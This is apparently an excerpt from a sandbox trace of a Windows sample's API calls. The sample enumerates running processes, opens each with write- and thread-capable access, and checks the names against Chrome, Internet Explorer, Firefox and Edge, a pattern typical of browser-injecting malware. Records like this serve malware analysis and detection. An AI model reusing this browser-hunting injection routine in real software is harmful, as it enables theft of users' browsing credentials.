	[0204.139] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x27f0
	[0204.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.140] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.140] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.140] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.141] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.141] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.142] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x27f4
	[0204.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.142] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.142] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.143] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.143] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.143] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.144] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x27f8
	[0204.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.144] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.144] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.145] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.145] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.145] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.146] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x27fc
	[0204.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.146] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.146] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.147] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.147] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.147] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.148] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x2804
	[0204.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.148] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.148] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.149] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.149] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.149] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.150] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x2808
	[0204.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.150] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.150] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.151] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.151] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.151] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0204.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x280c
	[0204.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.152] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0204.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.153] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.153] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0204.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.154] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.154] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.155] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x2810
	[0204.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.155] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.155] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.156] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.156] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.156] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0204.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x2814
	[0204.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.157] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.157] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.157] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.162] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.162] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0204.163] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x2818
	[0204.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.163] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0204.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.163] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.164] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0204.164] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.164] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.164] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0204.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x281c
	[0204.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.165] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0204.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.165] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.165] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0204.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.166] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.166] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0204.167] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x2820
	[0204.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.167] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0204.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.167] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.167] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.167] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0204.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.168] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.168] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0204.169] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x2824
	[0204.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.169] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0204.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.169] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.170] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0204.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.170] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.170] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0204.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x2828
	[0204.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.171] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0204.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.171] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.171] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0204.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.172] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.172] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0204.172] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x282c
	[0204.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.172] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0204.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.173] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.173] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0204.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.174] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.174] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0204.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0204.175] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0204.175] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x2830
	[0204.175] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.175] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0204.176] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.176] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.177] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0204.177] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.177] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.178] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0204.178] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x2834
	[0204.178] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.178] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0204.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.179] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.179] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0204.179] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.179] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.179] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0204.180] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x2838
	[0204.180] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.180] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0204.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.181] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.181] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0204.181] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.181] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.182] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0204.182] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x283c
	[0204.182] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.182] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0204.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.183] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.183] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0204.183] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.183] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.184] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0204.184] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x2840
	[0204.184] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.184] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0204.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.185] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.185] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.186] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0204.186] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.186] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.186] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0204.187] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x2844
	[0204.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.187] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0204.187] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.187] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.188] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0204.188] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.188] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.188] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0204.189] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x2848
	[0204.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.189] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0204.189] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.190] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.190] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0204.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.190] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.191] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0204.191] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x284c
	[0204.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.192] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0204.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.192] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.192] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.193] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0204.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.193] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.193] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0204.194] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x2850
	[0204.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.194] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0204.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.194] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0204.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.195] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0204.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.195] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0204.195] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0204.196] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x2854
	[0204.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0204.196] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
